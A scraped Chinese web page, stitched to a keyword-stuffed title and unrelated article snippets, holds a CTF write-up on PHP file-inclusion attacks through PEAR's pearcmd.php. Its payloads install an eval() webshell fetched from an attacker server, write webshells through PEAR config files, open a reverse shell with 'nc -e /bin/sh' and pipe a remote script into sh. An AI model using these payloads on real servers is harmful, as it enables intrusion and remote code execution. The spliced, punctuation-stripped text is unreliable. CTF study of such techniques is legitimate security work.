福州建设部官方网站本地建站教程

web/2025/9/26 2:10:55/文章来源:
福州建设部官方网站,本地建站教程,商标设计软件,c2c wordpressweb40 考点#xff1a;pear文件包含 pear是PHP的一个扩展 条件#xff1a; 1 有文件包含点 2 开启了pear扩展 #xff08;可以当他是一个框架#xff09; 3 配置文件中register_argc_argv 设置为On,而默认为Off#xff08;$_SERVER[‘argv’]生效#xff09; 4 找到…web40 考点pear文件包含 pear是PHP的一个扩展 条件 1 有文件包含点 2 开启了pear扩展 可以当他是一个框架 3 配置文件中register_argc_argv 设置为On,而默认为Off$_SERVER[‘argv’]生效 4 找到pear文件的位置默认位置是/usr/local/lib/php/ 查看phpinfo满足条件 PEAR扩展 全称PHP Extension and Application Repository PEAR扩展默认安装位置是 /usr/local/lib/php/ argv是数组argc是数字。可通过var_dump($_SERVER);语句查看 argv有独立GET之外获取参数的作用。比如传入?aaabbb argv数组两个元素是aaa和bbb。argc是数组的长度。 php中有些文件pearcmd.php是通过argv和argc来获取参数的。 利用Pear扩展进行文件包含 方法一远程文件下载下载远程木马到本地 ?file/usr/local/lib/php/pearcmd.phplalalainstall±R/var/www/html/http://vps-ip/shell.php lalala随便输第一个参数没用第二个有用 install安装远程扩展 -R指定安装到的目录 /var/www/html/目录 http://vps-ip/shell.txt从哪下载shell.php包含?php eval($_POST[1]);? 从返回信息中截取/var/www/html/后的地址比如/var/www/html/tmp/paer/download/shell.php就截取tmp/paer/download/shell.php payload ?file/usr/local/lib/php/pearcmd.phplalalainstall-R/var/www/html/http://120.46.41.173/shell.php 访问URL/tmp/paer/download/shell.phpPOST 1什么什么 进行RCE 进入/tmp/paer/download/shell.php地址POST进行RCE。 网上另外一种包含远程文件办法 https://blog.csdn.net/Mrs_H/article/details/122386511 payload如下(源自W4师傅) ?install±-installrootfile/usr/local/lib/php/pearcmd.phphttp://[vps]:[port]/test1.php 从上面的分析中我们不难看出这串payload所下载的文件的保存地址在 file/usr/local/lib/php/pearcmd.php/tmp/pear/download/路径下面这里我在使用的时候会遇到一些有关配置方面的问题因为名为file/usr/local/lib/php/pearcmd.php的文件夹是新创建的而我并没有权限对其进行写操作而导致利用失败。 但是除此之外install命令还有另外一种利用的姿势payload如下 file/usr/local/lib/php/pearcmd.phpinstall±R/tmphttp://192.168.1.9/index.php 重开环境 方法二生成配置文件配置项传入我们恶意的php代码的形式 配置文件中配置项一般都是ab形式比如usernameroot 如果配置项包含恶意代码比如man_dir?php eval($_POST[1]);? 假设包含恶意代码配置文件名字叫xxx.php如果我们能包含配置文件那我们就能执行恶意代码了。 GET ?file/usr/local/lib/php/pearcmd.php±c/tmp/ctf.php±dman_dir?php%20eval($_POST[1]);?±s -c创建一个配置文件 /tmp/ctf.php放配置文件的临时目录 -d增加配置项 man_dir?eval($_POST[1]);?配置项 -s保存hackbar会自动编码我们用burp发包。 然后包含/tmp/ctf.php就行了。 复现不出来不知道哪里出问题了 方法三写配置文件方式 GET /?file/usr/local/lib/php/pearcmd.phpaaaaconfig-create/var/www/html/?$_POST[1];?x.php 最后有一个空格 vps监听端口 nc -lvvnp 9023 burp发包 访问url/x.php POST 1sleep 3 判断shell是否能执行 POST 1nc vps-ip port -e /bin/sh 如果服务端没nc命令就用平台来反弹 POST 1curl https://your-shell.com/vps-ip:port | sh

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/81937.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

怎么不花钱建立网站长沙0731手机平台网报价

前言 OpenAI的创始人之一,大神Andrej Karpthy刚在微软Build 2023开发者大会上做了专题演讲:State of GPT(GPT的现状)。 他详细介绍了如何从GPT基础模型一直训练出ChatGPT这样的助手模型(assistant model)。作者不曾在其他公开视频里看过类似的内容,这或许是OpenAI官方…

网站建设首先用别人公司域名做网站

前端总结系列 前端总结基础篇CSS(一)布局前端总结基础篇CSS(二)视觉前端总结基础篇CSS(三)补充前端总结基础篇JS(一)原型、原型链、构造函数和字符串(String)…

建设机械网站制作江苏大才建设集团网站

现在科技发展飞快,班级查询系统已经成为了许多学校必备的教务工具。可以让学生们快速查找到班级的各项信息,包括但不限于课程安排、考试成绩、分班等。对老师来说,班级查询系统可以提高工作效率,减少重复劳动,学生或者…

网站建设月流量备案过的网站换域名

文章目录 前言1、相关文档2、环境说明3、部署3.1、安装 yum 工具包3.2、安装 docker3.3、安装 kubeadm,kubelet 和 kubectl3.4、安装 minikube 前言 学习 Kubernetes 但是搭建集群太麻烦。怎么办? MiniKube 是个简单的好办法! 1、相关文档 …

出名的网站建设软件酒店门户网站建设背景

1 声明和定义 声明就是告诉编译器有这个东西的存在,而定义则是这个东西的实现。 对于变量来说,声明就是告诉编译器存在这个名称的变量,定义则是给这个变量分配内存并赋值: // 变量声明,声明时不能赋值,如…

合肥住房和城乡建设部网站企业网络营销分析

16:强大的vi 引言:提到vi我们不得不提到vim 这两种编辑器就先当于我们Windows操作系统当中的记事本 不过vi以及vim编辑器熟练掌握之后是不需使用鼠标进行操作的 完全都是由键盘来进行控制 那为什么可以不用鼠标呢 就是因为我们的vi编辑器是基于多模式的…

一篇关于大学网站建设与管理的论文红旗渠建设集团有限公司网站

这个题目是贪心算法的基础练习题,解决思路是排序双指针谈心法,先将两个数组分别排序,优先满足最小胃口的孩子。(本题完整题目附在了最后面) 代码如下: class Solution(object):def findContentChildren(se…

网站建设过时了做网站之前备案

拼多多API接口是拼多多网提供的一种应用程序接口,允许开发者通过程序访问拼多多网站的数据和功能。通过拼多多API接口,开发者可以开发各种应用程序,如店铺管理工具、数据分析工具、购物比价工具等。在本章中,我们将介绍拼多多API接…

惠州网站制作询问薇贵州省建设局网站

来源:机器之心报编辑:杜伟、蛋酱2021 年之后,机器学习将会对哪些领域产生前所未有的影响?在过去的数年,见证了机器学习(ML)和计算机科学领域的许多变化。按照这种长弧形的进步模式,人…

页面设计模板网站网站建设属于什么费用

(1)网络协议 可以理解为规则,其中包含着数据传输和数据的解释。 典型的协议:传输层:tcp/udp协议,应用层:http/ftp协议,网络层:ip协议,网路接口:ar…

建设银行网站查余额查询wordpress创建登录页面模板

JavaScript中有两种函数:一种是语言内部事先定义好的函数叫内置函数,另一种是自己定义的 函数。使用内置函数,可提高编程效率,其中有六种内置函数。 eval函数 eval(expr)函数可以把一个字符串当作一个JavaS…

为什么有的网站只有版权没有备案吴中区网站设计公司

重载关系 同一作用域中&#xff0c;函数名相同&#xff0c;参数表不同的函数只有同一作用域中的同名函数才涉及重载问题&#xff0c;不 同作用域中同名函数遵循标识符隐藏原则 #include <QtCore/QCoreApplication> #include <QList> #include <QDebug> #in…

台州seo网站建设费用成都百度公司怎么样

点此获取更多相关资料 本文为霍格沃兹测试开发学社学员学习笔记分享 原文链接&#xff1a;https://ceshiren.com/t/topic/27071 一、文件上传 input标签可以直接使用send_keys(“文件路径/文件名”)上传文件 ele01 driver.find_element(By.ID,“上传按钮id”)ele01.send_keys(…

网站备案怎么做超链接最强wordpress主题

点击上方蓝字 关注我吧引言文件下载是比较常见的业务。常见的接口格式为/download?fileNamexxx.png,整个过程若没过滤目录穿越符号…/或者未对下载的路径进行处理限制。当传入的filename参数为../../etc/passwd即可穿越路径达到任意文件下载的效果。有些接口在尝试获取某一文件…

seo网站推广培训云南网站的设计公司简介

无服务器不是什么新事物&#xff0c;但是可以说&#xff0c;仍然有很多关于它的炒作&#xff0c;以及它将如何改变一切&#xff0c;以及未来将如何成为无服务器。 除了云提供商提供的无服务器/功能之外&#xff0c;还有越来越多的无服务器项目正在我们的路上&#xff0c;目的是…

一个网站通常包含多个网页吗重庆专业网站推广平台

NeRF in the Wild: Neural Radiance Fields for Unconstrained Photo Collections(野外的 NERF: 用于无约束照片采集的神经辐射场&#xff09; Abstract 我们提出了一种基于学习的方法来合成新的视图的复杂场景使用只有非结构化的收集野生照片。我们建立在神经辐射场(neRF)的…

印刷 网站源码手机和电脑网站分开做

作为一个新兴的 Layer1 公链&#xff0c;Aptos 自诞生之日起的理想便是 “A Layer 1 for everyone” 当 Web3 深陷熊市阴影之时&#xff0c;Aptos 奋力为开发者找到了全新的技术路径&#xff0c;正有 200 项目正在开发&#xff0c;并且已有大量 DeFi 项目落实部署工作&#xff…

电商网站建设源代码山东省住房和城乡建设网站

1.背景 KdMapper是一个利用intel的驱动漏洞可以无痕的加载未经签名的驱动&#xff0c;本文是利用其它漏洞&#xff08;参考《【转载】利用签名驱动漏洞加载未签名驱动》&#xff09;做相应的修改以实现类似功能。需要大家对KdMapper的代码有一定了解。 2.驱动信息 驱动名称spee…

图库网站源码湖南衡阳网站建设

给社区发邮件步骤 UEFI订阅邮件列表 开发者订阅邮箱 develedk2.groups.io | Home 点击Join This Group&#xff0c;按照步骤填写自己邮箱地址&#xff08;该地址是edk2,发送邮件到该邮箱的地址&#xff09; 自己邮箱确认就可以自动收到邮件了 比如&#xff1a;

信息类网站免费制作app平台

转载自 BATJ面试必会|Jvm 虚拟机篇 目录 一、运行时数据区域 程序计数器 Java 虚拟机栈 本地方法栈 堆 方法区 运行时常量池 直接内存 二、垃圾收集 判断一个对象是否可被回收 引用类型 垃圾收集算法 垃圾收集器 三、内存分配与回收策略 Minor GC 和 Full GC 内存…